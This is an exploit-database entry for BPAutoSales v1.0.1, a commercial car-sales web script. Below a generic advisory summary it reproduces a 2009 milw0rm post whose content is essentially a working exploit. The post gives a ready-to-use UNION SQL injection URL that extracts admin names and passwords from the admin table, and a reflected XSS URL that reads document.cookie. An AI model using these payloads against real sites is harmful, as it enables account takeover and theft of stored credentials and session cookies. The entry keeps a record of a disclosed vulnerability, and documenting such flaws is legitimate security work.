BPAutoSales v1.0.1 Remote SQL Injection Vuln.

vendor:

BPAutoSales

by:

xoron

CVSS

HIGH

SQL Injection

CWE

Product Name: BPAutoSales

Affected Version From: 1.0.1

Affected Version To: 1.0.1

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

BPAutoSales v1.0.1 Remote SQL Injection Vuln.

The BPAutoSales v1.0.1 is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to the database and execute arbitrary SQL commands.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the application.

Source

Exploit-DB raw data:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
=                                 XORON 2009(C)
=
=              BPAutoSales v1.0.1 Remote SQL Injection Vuln.       
=              
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
= Script:   BPAutoSales, version 1.0.1
= Price:      $229
=
= Author: xoron
=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
= BUGS    
=
=  Sql Injections:
=      index.php?cmd=advertise_details&category=car&aid=-1/**/union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,name,22,password,login/**/from/**/admin/**/where/**/id=1/*
=                       
=  XSS:
=      index.php?cmd=car_search&type=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 

# milw0rm.com [2009-01-30]